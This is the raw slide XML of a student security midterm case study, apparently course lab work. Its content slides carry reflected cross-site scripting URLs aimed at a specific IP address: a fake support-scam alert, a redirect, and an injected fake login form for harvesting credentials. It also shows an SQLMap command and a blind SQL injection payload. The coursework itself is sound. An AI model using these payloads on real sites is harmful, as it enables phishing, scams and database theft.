                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Google Shape;46;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2958300" y="4445733"/>
            <a:ext cx="6275200" cy="106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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153369363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5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 47"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Google Shape;48;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-67" y="7467"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1">
              <a:alpha val="235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10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5749867" y="4892367"/>
            <a:ext cx="6515200" cy="14024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10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4972767"/>
            <a:ext cx="5145200" cy="10384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700"/>
              <a:buNone/>
              <a:defRPr sz="3333"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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;51;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-454949" y="-1050849"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">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52" name="Google Shape;52;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-581949" y="-1342949"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277302772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2.xml"/><Relationship Id="rId1"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1510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a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;7;p1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="1536633"/>
            <a:ext cx="10290000" cy="4602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marL="914400" lvl="1"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marL="1371600" lvl="2"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marL="1828800" lvl="3"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marL="2286000" lvl="4"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marL="2743200" lvl="5"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marL="3200400" lvl="6"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marL="3657600" lvl="7"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marL="4114800" lvl="8" indent="-3175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a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3806584985"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk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 id="2147483827" r:id="rId25"/>
    <p:sldLayoutId id="2147483828" r:id="rId26"/>
    <p:sldLayoutId id="2147483829" r:id="rId27"/>
    <p:sldLayoutId id="2147483830" r:id="rId28"/>
    <p:sldLayoutId id="2147483831" r:id="rId29"/>
    <p:sldLayoutId id="2147483832" r:id="rId30"/>
    <p:sldLayoutId id="2147483833" r:id="rId31"/>
    <p:sldLayoutId id="2147483834" r:id="rId32"/>
    <p:sldLayoutId id="2147483835" r:id="rId33"/>
    <p:sldLayoutId id="2147483836" r:id="rId34"/>
    <p:sldLayoutId id="2147483837" r:id="rId35"/>
    <p:sldLayoutId id="2147483838" r:id="rId36"/>
    <p:sldLayoutId id="2147483839" r:id="rId37"/>
    <p:sldLayoutId id="2147483840" r:id="rId38"/>
    <p:sldLayoutId id="2147483841" r:id="rId39"/>
    <p:sldLayoutId id="2147483842" r:id="rId40"/>
    <p:sldLayoutId id="2147483843" r:id="rId41"/>
    <p:sldLayoutId id="2147483844" r:id="rId42"/>
    <p:sldLayoutId id="2147483845" r:id="rId43"/>
    <p:sldLayoutId id="2147483846" r:id="rId44"/>
    <p:sldLayoutId id="2147483847" r:id="rId45"/>
    <p:sldLayoutId id="2147483848" r:id="rId46"/>
    <p:sldLayoutId id="2147483849" r:id="rId47"/>
    <p:sldLayoutId id="2147483850" r:id="rId48"/>
    <p:sldLayoutId id="2147483851" r:id="rId49"/>
    <p:sldLayoutId id="2147483852" r:id="rId50"/>
    <p:sldLayoutId id="2147483853" r:id="rId51"/>
    <p:sldLayoutId id="2147483854" r:id="rId52"/>
    <p:sldLayoutId id="2147483855" r:id="rId53"/>
    <p:sldLayoutId id="2147483856" r:id="rId54"/>
    <p:sldLayoutId id="2147483857" r:id="rId55"/>
    <p:sldLayoutId id="2147483858" r:id="rId56"/>
    <p:sldLayoutId id="2147483859" r:id="rId57"/>
    <p:sldLayoutId id="2147483868" r:id="rId5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45"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Google Shape;446;p60"/>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47" name="Google Shape;447;p60"/>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722663471"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="dk2" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483862"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49"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Google Shape;450;p62"/>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51" name="Google Shape;451;p62"/>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949396324"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="dk2" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483864"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53"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Google Shape;454;p64"/>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55" name="Google Shape;455;p64"/>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924645042"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="dk2" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483866" r:id="rId1"/>
    <p:sldLayoutId id="2147483867"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2.xml"/><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8BD2-5A97-590A-911E-9F10BF00AA68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6766183" y="1122363"/>
            <a:ext cx="3834864" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Midterm – Case Study</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>INT4023</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EA86440-0E13-5AEE-08B3-135DDBDA4810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7261694" y="3556962"/>
            <a:ext cx="3184804" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Dalton Murray</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1403776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dirty="0"/>
              <a:t>Reflected Cross Site Scripting – Example 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6062D7AC-2C2B-8227-D384-12D038E3C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7368" y="1412432"/>
            <a:ext cx="7224322" cy="3938739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4E9425B-A759-3277-EFE7-67A67A8DAC1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100310" y="2052835"/>
            <a:ext cx="4709949" cy="32983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en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some basic things we can do are create fake alerts on the website telling them to call someone, http://54.189.124.94/index.php?term=%3Cscript%3Ealert(%22Error%20found!%20Please%20call%20(111)%20111%20-%201111%22);%3C/script%3E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2037635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dirty="0"/>
              <a:t>Reflected Cross Site Scripting – Example 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4E9425B-A759-3277-EFE7-67A67A8DAC1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100310" y="2052835"/>
            <a:ext cx="4709949" cy="32983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en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can also make people think the URL is real but redirect them to another website entirely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://54.189.124.94/index.php?term=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;%20URL=https://www.google.com%22%20/%3E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We could use this, for example, to send them to a duplicate of the website to gain their credentials, or to a website claiming they have a virus and to call them</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F769DC6C-E66A-CB83-13B0-B17E142D6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882" y="2190113"/>
            <a:ext cx="6991191" cy="3801460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2550982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dirty="0"/>
              <a:t>Reflected Cross Site Scripting – Example 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4E9425B-A759-3277-EFE7-67A67A8DAC1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100311" y="2052834"/>
            <a:ext cx="4558124" cy="42528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en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If we get more advanced into it, we can even replace elements on the page with our own elements, such as creating a login form which then submits the credentials to us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://54.189.124.94/index.php?term=%3Cbr%3E%3Cdiv%3E%3Cform%20action=POST%3EUsername:%3Cbr%3E%20%3Cinput%20type=%E2%80%9Dusername%E2%80%9D%20name=%E2%80%9Dusername%E2%80%9D%3E%3C/br%3EPassword:%3Cbr%3E%20%3Cinput%20type=%E2%80%9Dpassword%E2%80%9D%20name=%20%E2%80%9Dpassword%E2%80%9D%3E%3C/br%3E%3Cbr%3E%20%3Cbutton%20type=%E2%80%9Dsubmit%E2%80%9D%20%20style=%22width:%2015%%22%3ELogin%3Cbr%3E%3C/div%3E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This looks very rough, but I did it within a few seconds, so someone given more time could make this look much better and more believable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Graphical user interface, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{194FDA14-261A-68F5-4756-376089547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8434" y="1829408"/>
            <a:ext cx="7433256" cy="4059255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="831980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136EDE-418F-DF22-8FAE-10A23706362A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50674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dirty="0"/>
              <a:t>Found Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-u http://54.189.124.94 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --forms --crawl=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://54.189.124.94/index.php?term=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Found vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Type: time-based blind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Payload: term=' AND (SELECT 3494 FROM (SELECT(SLEEP(5)))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KlpX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) AND '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KfTv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KfTv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Type: UNION query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
